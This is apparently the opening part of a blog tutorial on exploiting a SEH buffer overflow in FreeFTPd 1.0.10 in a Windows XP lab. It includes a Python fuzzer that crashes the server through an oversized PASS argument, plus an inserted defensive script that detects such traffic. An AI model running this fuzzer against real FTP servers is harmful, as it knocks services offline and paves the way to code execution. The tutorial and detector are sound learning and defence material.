In this blog post series we will look into exploiting a SEH buffer overflow in the FreeFTPd 1.0.10 application.
To do so, we load the application into Immunity Debugger on a Windows XP test VM. This operating system does not use memory protections such as ASLR that would defeat a simple buffer overflow attack.
We use the following fuzzer to trigger the buffer overflow, verify the crash and then write our own exploit code.
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import sys
import socket

BUFFERSIZE = 1024  # how much of each server reply we read

if __name__ == "__main__":
    maxbuffersize = 10000  # largest payload to send
    buffer_inc = 5000      # payload grows by this many bytes per round
    bufferarray = []
    buffercount = maxbuffersize // buffer_inc
    IPV4 = '192.168.0.137'  # IP of the Windows XP VM
    PORT = 21               # port of the FreeFTPd process

    # Build the payloads: 0, 5000 and 10000 bytes of 'A' (0x41).
    while len(bufferarray) < buffercount + 1:
        bufferarray.append('\x41' * buffer_inc * len(bufferarray))

    # One fresh connection per payload; log in as anonymous and send the
    # payload as the password.
    for buffer in bufferarray:
        CLIENT = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
        CLIENT.connect((IPV4, PORT))
        CLIENT.recv(BUFFERSIZE)  # banner
        print("Fuzzing with %4d" % len(buffer))
        CLIENT.send('USER anonymous\r\n')
        data = CLIENT.recv(BUFFERSIZE)
        print("data: %s" % data)
        CLIENT.send('PASS ' + buffer + '\r\n')
        data = CLIENT.recv(BUFFERSIZE)
        print("data: %s" % data)
        CLIENT.close()
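Seen from the defender's side, the traffic this fuzzer produces is easy to recognise on the control channel: a PASS command whose argument is thousands of bytes of a single repeated value. The following script is an added example, not part of the original post, that parses client command lines from an FTP session and flags oversized, repetitive or non-printable arguments. The per-command length limits, the repetition threshold and the sample session are constructed assumptions for illustration; RFC 959 sets no argument length, so the limits are a policy choice to tune per deployment.

```python
# Added example: monitor for the FTP control channel that flags the kind of
# traffic the fuzzer above produces. Parses client command lines, measures
# the argument length per command and reports suspicious ones.
import re

# Per-command argument limits (constructed assumptions, tune per deployment).
MAX_ARG_LEN = {"USER": 64, "PASS": 128}
DEFAULT_MAX_ARG_LEN = 256
# Fraction of a single byte value that marks a padding-style payload.
REPEAT_RATIO = 0.9

# FTP command: 3-4 letter verb, optionally followed by a space and an argument.
CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?: (.*))?$")


def analyze_command(line):
    """Describe one client command line; return None if it is not a command."""
    line = line.rstrip("\r\n")
    m = CMD_RE.match(line)
    if not m:
        return None
    verb = m.group(1).upper()
    arg = m.group(2) or ""
    limit = MAX_ARG_LEN.get(verb, DEFAULT_MAX_ARG_LEN)
    findings = []
    if len(arg) > limit:
        findings.append("oversized argument (%d > %d)" % (len(arg), limit))
    if len(arg) >= 32:
        most_common = max(arg.count(c) for c in set(arg))
        if most_common / float(len(arg)) >= REPEAT_RATIO:
            findings.append("repetitive padding-style argument")
    if any(ord(c) < 0x20 or ord(c) > 0x7e for c in arg):
        findings.append("non-printable bytes in argument")
    return {"verb": verb, "arg_len": len(arg), "findings": findings}


def scan_session(lines):
    """Analyse a list of client command lines; return only the suspicious ones."""
    alerts = []
    for n, line in enumerate(lines, 1):
        info = analyze_command(line)
        if info and info["findings"]:
            info["line"] = n
            alerts.append(info)
    return alerts


# Constructed sample session: a normal login followed by the fuzzer's payloads.
SAMPLE_SESSION = [
    "USER anonymous\r\n",
    "PASS guest@example.org\r\n",
    "USER anonymous\r\n",
    "PASS " + "A" * 5000 + "\r\n",
    "USER anonymous\r\n",
    "PASS " + "A" * 10000 + "\r\n",
]

if __name__ == "__main__":
    for a in scan_session(SAMPLE_SESSION):
        print("line %d: %s arg_len=%d: %s"
              % (a["line"], a["verb"], a["arg_len"], ", ".join(a["findings"])))
```

Running it against the sample session reports only lines 4 and 6, each as both oversized and repetitive; the legitimate login on line 2 passes. The same function can be fed lines from a packet capture or a server log to spot fuzzing runs like the one above before a crash is reached.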
After running this script with the correct IPV4 and PORT values, we get an overflow that looks like this:
In the registers we see something like this:
We can now verify that it is in fact a SEH overflow by opening the SEH chain for the exception:
The SEH record has already been overwritten with bytes from our buffer. Now we only need to find the offsets of those addresses within the buffer, which we do with Metasploit's pattern_create.rb:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb